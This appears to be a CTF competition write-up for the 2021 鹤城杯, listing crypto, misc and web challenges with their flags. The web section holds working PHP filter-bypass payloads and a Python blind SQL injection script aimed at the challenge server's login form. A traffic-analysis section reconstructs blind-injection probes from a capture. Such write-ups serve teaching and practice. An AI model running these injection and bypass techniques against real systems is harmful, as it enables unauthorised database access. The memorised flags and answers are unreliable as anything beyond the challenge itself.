WP - 2021鹤城杯
crypto
easy crypto
Core Socialist Values encoding (社会主义核心价值观编码).
flag{IlUqU9O5guX6YiITsRNPiQmbhNRjGuTP}
a crypto
Thrown straight into a cipher-identification tool, solved in one shot.
flag{W0w_y0u_c4n_rea11y_enc0d1ng!}
misc
NEW_Misc
After decoding, inspect the output file.
flag{verY_g00d_YoU_f0und_th1s}
Traffic analysis (流量分析)
Drag the capture into Kali and run `strings timu.pcapng | grep flag`; the hits show this is blind SQL injection traffic.
Save the output as flag.txt, pull out the line immediately before each change of the second argument of substr() (that is the last probe for each position, i.e. the accepted guess), and record the corresponding ASCII values.
Script to turn the ASCII values into a string:
# ASCII values recorded from the capture, one per extracted character
a = [102,108,97,103,123,119,49,114,101,115,104,65,82,75,95,101,122,95,49,115,110,116,105,116,125,126,126,126,126,60]
b = []
for i in a:
    b.append(chr(i))
print(b)             # list of single characters
print(''.join(b))    # joined into the flag string
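As an added forensic example (not the writeup author's script), the following applies the rule above directly to the request lines instead of a hand-copied ASCII list: keep the last probe for each substr() position, then cut off the junk produced by probes past the end of the string (the trailing `~~~~<` in the list above). The sample requests are constructed here, not taken from timu.pcapng, and the injected expression inside them is assumed.

```python
import re

# One blind-injection probe: capture the substr() position under test and the
# byte value it is compared with. The injected expression in front is matched
# lazily so other injection shapes in the capture are still recognised.
PROBE = re.compile(r"substr\(.*?,(\d+),1\)\)=(\d+)", re.IGNORECASE)


def reconstruct(log_text: str) -> str:
    """Rebuild the extracted string from the probes, byte by byte.

    For each position only the last probe before the position advances is
    kept: that is the guess that made the injected condition true.
    """
    last_guess = {}
    for line in log_text.splitlines():
        m = PROBE.search(line)
        if m:
            pos, val = int(m.group(1)), int(m.group(2))
            last_guess[pos] = val  # later probes for the same position win
    return "".join(chr(last_guess[p]) for p in sorted(last_guess))


def trim_to_flag(s: str) -> str:
    """Drop bytes recovered from probes sent past the end of the data.

    Tools keep probing positions beyond the real string, which produces junk
    like the trailing '~~~~<' in the ASCII list above; the closing '}' of the
    flag wrapper marks the true end.
    """
    end = s.find("}")
    return s if end == -1 else s[: end + 1]


# Constructed sample (not from timu.pcapng): for each position the last probe
# carries the accepted value, followed by two probes past the end of the string.
SAMPLE_LOG = "\n".join(
    "GET /?id=1'and(ascii(substr((select(f)from(t)),%d,1))=%d)%%23" % (p, v)
    for p, v in [(1, 100), (1, 102), (2, 107), (2, 108), (3, 97),
                 (4, 103), (5, 123), (6, 120), (7, 125), (8, 126), (9, 126)]
)

if __name__ == "__main__":
    raw = reconstruct(SAMPLE_LOG)
    print(raw, "->", trim_to_flag(raw))  # flag{x}~~ -> flag{x}
```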
a_misc
web
middle_magic
Level 1
?aaa=%0apass_the_level_1%23
Bypassing php preg_match()
A %0a (newline) gets past the pattern.
Level 2
admin[]=1&root_pwd[]=2
Level 3
Bypassing php json_decode()
It can be bypassed with a loose comparison of the form 0=="string".
level_3={"result":0}
Full payload:
GET
?aaa=%0apass_the_level_1%23
POST
admin[]=1&root_pwd[]=2&level_3={"result":0}
flag
flag{f03d41bf6c8d55f12324fd57f7a00427}
easy_sql_2
Some keywords are filtered: select, union and whitespace.
database() -> ctf
Table/column name lookups via information_schema.tables and information_schema.columns are filtered.
https://blog.csdn.net/weixin_43536759/article/details/104848957
https://www.cnblogs.com/20175211lyz/p/12358725.html
https://blog.dkkkkk.com/basis/NoColumnInjection/#_1
# -*-coding:utf-8-*-
import requests

# Character set, highest first: the comparison below is true for the first j at
# which prefix+j sorts before the target row, so scanning downward lands on it.
DIC = "~}|{zyxwvutsrqponmlkjihgfedcba`_^]\\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+*)(&%$#!"


def bind_sql(url):
    flag = ""
    for i in range(1, 1000):
        f = flag
        for j in DIC:
            guess = flag + j
            # Earlier variant comparing against a whole row of mysql.innodb_table_stats:
            # payload = "11'||('ctf',binary'{}',1,2,3,4)<(table/**/mysql.innodb_table_stats/**/limit/**/1,1)#".format(guess)
            # tables in ctf: admin, fl11aag
            payload = "11'||(binary'{}')<(table/**/ctf.fl11aag/**/limit/**/1,1)#".format(guess)
            print(payload)
            data = {
                "username": payload,
                "password": "admin",
            }
            res = requests.post(url=url, data=data)
            if 'success' in res.text:
                if j == '~':
                    # a hit on '~' is treated as the previous byte having been
                    # guessed one too low: correct it and stop
                    flag = flag[:-1] + chr(ord(flag[-1]) + 1)
                    print(flag)
                    exit()
                flag += j
                print(flag)
                break
        if flag == f:
            # no character accepted this round: the string is complete
            break
    return flag


if __name__ == '__main__':
    url = 'http://182.116.62.85:26571/login.php'
    result = bind_sql(url)
    print(result)
EasyP
http://182.116.62.85:21895/index.php/utils.php/%80?%73%68%6f%77%5f%73%6f%75%72%63%65
Reference: basename() ignores a trailing run of characters in the range [\x80-\xff].
Reference: $_SERVER['QUERY_STRING'] is not url-decoded.
flag{bsyxmK7ncU5nPjsGMckFo8kgq95qRasg}
spring
https://github.com/Medicean/VulApps/tree/master/s/springwebflow/1